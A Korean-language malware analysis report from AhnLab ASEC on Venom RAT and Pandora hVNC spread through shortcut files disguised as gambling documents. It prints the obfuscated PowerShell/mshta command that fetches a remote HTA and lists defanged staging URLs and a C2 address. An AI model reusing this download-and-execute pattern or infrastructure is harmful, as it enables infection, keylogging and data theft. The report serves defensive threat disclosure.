도박 관련 내용으로 위장하여 유포 중인 RAT 악성코드

AhnLab SEcurity intelligence Center(ASEC)은 RAT 악성코드가 불법 도박 관련 파일로 위장하여 유포되는 것을 확인하였다. 지난 달 게시한 VenomRAT 유포 방법[1]과 동일하게 바로가기(.lnk) 파일을 통해 유포되며 HTA에서 RAT 악성코드를 바로 다운로드한다.

유포가 확인된 바로가기 파일에는 악성 파워쉘 명령어가 포함되어 있으며, MSHTA를 실행하여 악성 스크립트를 다운로드한다.

• 파워쉘 명령어
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.*  ‘hxxp://193.***.***[.]253:7287/2.hta.hta’

확인된 바로가기 파일에 포함된 악성 URL은 다음과 같다.

• hxxp://193.***.***[.]253:7287/2.hta.hta
• hxxp://193.***.***[.]253:7287/.hta
• hxxp://85.209.176[.]158:7287/6.hta

hxxp://193.***.***[.]253:7287/2.hta.hta에는 기존과 동일하게 VBS 코드가 존재한다. VBS 코드 내부에는 정상 문서 파일과 RAT 악성코드 다운로드하는 파워쉘 명령어가 난독화되어 있다. 디코딩된 파워쉘 명령어는 다음과 같다.

[그림 3]의 파워쉘 명령어는 실행 시 hxxp://193.***.***[.]253:7287/percent.xlsm에서 엑셀 문서를 다운로드하여 %APPDATA% 폴더에 percent.xlsm 파일명으로 저장한다. 다운로드 된 엑셀 문서(percent.xlsm) 본문에는 [그림 4]와 같이 배팅 관련 방법이 작성되어 있어 관련 사용자를 대상으로 유포되고 있는 것을 알 수 있다.

이후 hxxp://193.***.***[.]253:7287/darkss.exe에서 추가 실행파일을 다운로드하여 %APPDATA% 폴더에 darkss.exe명으로 저장한다. 다운로드 된 실행 파일은 Venom RAT 악성코드로 키로깅 및 사용자 정보를 유출할 뿐만 아니라 공격자로부터 명령을 받아 다양한 악성 행위를 수행할 수 있다.

• C2 : 193.***.***[.]253:4449

앞서 확인된 URL(193.***.***[.]253:7287, 85.209.176[.]158:7287)에는 본문에서 설명한 악성 파일 외에 다양한 악성 HTA 스크립트와 디코이 문서 파일, 악성 실행 파일이 존재한다.

추가로 확인된 디코이 문서 역시 도박 사이트 관련 정보를 포함하고 있으며, 일부 사용자의 개인정보가 포함되어 있다.

[그림 6]에서 확인된 악성 실행 파일인 Darksoft111.exe 와 Pandora_cryptered.exe는 각각 Venom RAT과 Pandora hVNC 악성코드로 공격자는 다양한 종류의 RAT 악성코드를 사용하고 있어 사용자의 각별한 주의가 필요하다.

[파일 진단]
Downloader/LNK.Generic.S2541(2024.01.25.02)
Downloader/HTA.Agent (2024.01.29.03)
Trojan/Win.PWSX-gen (2024.01.12.03)
Trojan/Win.Krypt (2024.01.29.03)

[행위 진단]
Execution/MDP.Powershell.M2514

AhnLab TIP를 구독하시면 연관 IOC 및 상세 분석 정보를 추가적으로 확인하실 수 있습니다. 자세한 내용은 아래 배너를 클릭하여 확인해보세요.